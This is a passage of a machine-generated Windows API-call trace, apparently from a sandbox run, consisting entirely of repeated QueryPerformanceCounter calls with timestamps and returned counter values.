lpPerformanceCount=0x6adfdfc*=3095962731343) returned 1 [0140.808] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095962779567) returned 1 [0140.824] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095964326304) returned 1 [0140.824] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095964344213) returned 1 [0140.840] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095965930763) returned 1 [0140.840] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095965944349) returned 1 [0140.856] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095967519801) returned 1 [0140.856] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095967533060) returned 1 [0140.872] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095969125680) returned 1 [0140.872] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095969143769) returned 1 [0140.888] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095970717180) returned 1 [0140.888] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095970733654) returned 1 [0140.904] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095972331001) returned 1 [0140.904] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095972351651) returned 1 [0140.920] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095973929276) returned 1 [0140.920] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095973947504) returned 1 [0140.936] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095975530795) returned 1 [0140.936] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095975553855) returned 1 [0140.952] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095977124807) returned 1 [0140.952] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095977140693) returned 1 [0140.968] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095978728151) returned 1 [0140.968] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095978744240) returned 1 [0140.984] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095980326998) returned 1 [0140.984] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095980345922) returned 1 [0141.000] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095981926622) returned 1 [0141.000] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095981943564) returned 1 [0141.016] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095983616375) returned 1 [0141.017] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095983639967) returned 1 [0141.032] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095985122041) returned 1 [0141.032] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095985138586) returned 1 [0141.048] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095986732265) returned 1 [0141.049] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095986758187) returned 1 [0141.064] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095988321407) returned 1 [0141.064] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095988335661) returned 1 [0141.082] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095990134452) returned 1 [0141.082] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095990160916) returned 1 [0141.098] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095991721098) returned 1 [0141.098] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095991734433) returned 1 [0141.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095993309095) returned 1 [0141.114] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095993327610) returned 1 [0141.130] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095994886059) returned 1 [0141.130] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095994912082) returned 1 [0141.181] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096000050374) returned 1 [0141.182] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096000066798) returned 1 [0141.183] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096000168934) returned 1 [0141.183] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096000185539) returned 1 [0141.195] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096001427869) returned 1 [0141.195] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096001443789) returned 1 [0141.211] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096003027025) returned 1 [0141.211] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096003046810) returned 1 [0141.227] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096004625117) returned 1 [0141.227] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096004642976) returned 1 [0141.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096006227379) returned 1 [0141.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096006246121) returned 1 [0141.259] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096007835562) returned 1 [0141.260] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096007891043) returned 1 [0141.275] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096009375632) returned 1 [0141.275] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096009393352) returned 1 [0141.292] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096011138482) returned 1 [0141.293] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096011164021) returned 1 [0141.307] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096012593713) returned 1 [0141.307] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096012632513) returned 1 [0141.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096014176548) returned 1 [0141.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096014220852) returned 1 [0141.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096015782933) returned 1 [0141.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096015800891) returned 1 [0141.355] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096017384802) returned 1 [0141.355] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096017406707) returned 1 [0141.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096018980522) returned 1 [0141.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096018998923) returned 1 [0141.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096020571987) returned 1 [0141.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096020587048) returned 1 [0141.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096022172024) returned 1 [0141.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096022187833) returned 1 [0141.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096023783288) returned 1 [0141.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096023798302) returned 1 [0141.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096025379816) returned 1 [0141.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096025394141) returned 1 [0141.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096027003043) returned 1 [0141.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096027020408) returned 1 [0141.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096028581180) returned 1 [0141.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096028603117) returned 1 [0141.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096030174892) returned 1 [0141.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096030193254) returned 1 [0141.508] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096032745008) returned 1 [0141.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096032761700) returned 1 [0141.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096033366496) returned 1 [0141.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096033394221) returned 1 [0141.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096034957189) returned 1 [0141.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096034988260) returned 1 [0141.547] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096036559663) returned 1 [0141.547] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096036582809) returned 1 [0141.563] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096038158840) returned 1 [0141.563] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096038183929) returned 1 [0141.579] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096039759493) returned 1 [0141.579] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096039784709) returned 1 [0141.594] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096041354652) returned 1 [0141.595] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096041381243) returned 1 [0141.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096042950900) returned 1 [0141.611] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096042967959) returned 1 [0141.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096044552747) returned 1 [0141.627] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096044567356) returned 1 [0141.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096046144326) returned 1 [0141.643] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096046161894) returned 1 [0141.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096047748240) returned 1 [0141.659] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096047771755) returned 1 [0141.676] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096049531413) returned 1 [0141.676] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096049548596) returned 1 [0141.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096051091205) returned 1 [0141.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096051105551) returned 1 [0141.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096052841537) returned 1 [0141.710] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096052858116) returned 1 [0141.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096054358655) returned 1 [0141.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096054384368) returned 1 [0141.740] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096055944480) returned 1 [0141.741] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096055961704) returned 1 [0141.757] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096057557826) returned 1 [0141.757] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096057580213) returned 1 [0141.773] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096059237867) returned 1 [0141.774] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096059256045) returned 1 [0141.789] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096060797017) returned 1 [0141.789] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096060814667) returned 1 [0141.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096062396723) returned 1 [0141.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096062414228) returned 1 [0141.821] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096064366057) returned 1 [0141.825] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096064415686) returned 1 [0141.837] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096065600006) returned 1 [0141.837] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096065624111) returned 1 [0141.853] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096067194575) returned 1 [0141.853] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096067211495) returned 1 [0141.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096068793594) returned 1 [0141.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096068809940) returned 1 [0141.885] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096070395321) returned 1 [0141.885] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096070411905) returned 1 [0141.901] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096071996088) returned 1 [0141.901] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096072012819) returned 1 [0141.917] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096073593718) returned 1 [0141.917] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096073610388) returned 1 [0141.933] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096075172849) returned 1 [0141.933] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096075190430) returned 1 [0141.949] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096076778529) returned 1 [0141.949] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096076799853) returned 1 [0141.965] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096078371509) returned 1 [0141.965] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096078388168) returned 1 [0141.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096079951378) returned 1 [0141.981] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096079968223) returned 1 [0141.997] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096081556756) returned 1 [0141.997] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096081570031) returned 1 [0142.013] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096083155722) returned 1 [0142.013] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096083170343) returned 1 [0142.028] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096084745727) returned 1 [0142.029] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096084759868) returned 1 [0142.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096086349987) returned 1 [0142.045] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096086364045) returned 1 [0142.061] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096087957477) returned 1 [0142.061] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096087970848) returned 1 [0142.076] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096089550515) returned 1 [0142.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096089564593) returned 1 [0142.099] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096091761325) returned 1 [0142.099] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096091788640) returned 1 [0142.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096092753015) returned 1 [0142.109] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096092766773) returned 1 [0142.124] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096094350241) returned 1 [0142.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096094366001) returned 1 [0142.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096095953988) returned 1 [0142.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096095969214) returned 1 [0142.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096097552521) returned 1 [0142.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096097566066) returned 1 [0142.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096099153960) returned 1 [0142.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096099167574) returned 1 [0142.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096100747061) returned 1 [0142.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096100761954) returned 1 [0142.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096102345164) returned 1 [0142.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096102358051) returned 1 [0142.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096103998821) returned 1 [0142.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096104015305) returned 1 [0142.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096105603366) returned 1 [0142.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096105619596) returned 1 [0142.253] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096107201418) returned 1 [0142.253] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096107217353) returned 1 [0142.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096108795548) returned 1 [0142.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096108809233) returned 1 [0142.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096110396534) returned 1 [0142.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096110411019) returned 1 [0142.301] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096111996470) returned 1 [0142.301] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096112010610) returned 1 [0142.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096114133634) returned 1 [0142.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096114146948) returned 1 [0142.385] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096120442239) returned 1 [0142.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096120455535) returned 1 [0142.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096120497047) returned 1 [0142.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096120511256) returned 1 [0142.401] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096121979525) returned 1 [0142.401] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096121992294) returned 1 [0142.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096123584938) returned 1 [0142.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096123598954) returned 1 [0142.433] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096125181083) returned 1 [0142.433] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096125194861) returned 1 [0142.449] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096126781885) returned 1 [0142.449] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096126796516) returned 1 [0142.465] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096128382781) returned 1 [0142.465] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096128398402) returned 1 [0142.481] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096129980626) returned 1 [0142.481] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096129993160) returned 1 [0142.498] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096131734530) returned 1 [0142.498] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096131749585) returned 1 [0142.513] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096133181063) returned 1 [0142.513] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096133194032) returned 1 [0142.529] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 